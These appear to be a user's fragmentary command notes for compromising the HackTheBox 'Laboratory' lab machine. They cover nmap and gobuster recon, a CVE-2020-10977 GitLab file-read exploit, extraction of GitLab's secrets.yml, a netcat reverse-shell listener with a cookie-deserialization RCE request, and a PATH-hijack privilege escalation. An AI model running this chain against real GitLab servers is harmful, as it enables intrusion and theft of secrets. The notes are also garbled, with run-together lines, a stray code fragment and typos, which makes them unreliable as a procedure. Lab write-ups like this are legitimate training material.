sudo nmap -sV 10.10.10.216 -oA nmap/10.10.10.216
gobuster dir -u "https://laboratory.htb/" -w ../../../文件/SecLists/Discovery/Web-Content/raft-small-words.txt -x html
-t
to avoid certificate checkpython3 cve_2020_10977.py https://git.laboratory.htb user passwd
'.format(filename)
sudo docker run gitlab/gitlab-ce:12.8.1-ce.0
sudo exec -it docker_img_name bash
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
cd /etc/gitlab
vim gitlab.rb
gitlab-ctl reconfigure
gitlab-rails console
nc -lvnp 9001
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=enter_rce_payload_here" -k
gitlab-rails console
User.find_by(username: "your_username")
curl 127.0.0.1:60080 -L
ltrace docker-security
chmod
(need to chomod +x)export PATH=/tmp/bin:$PATH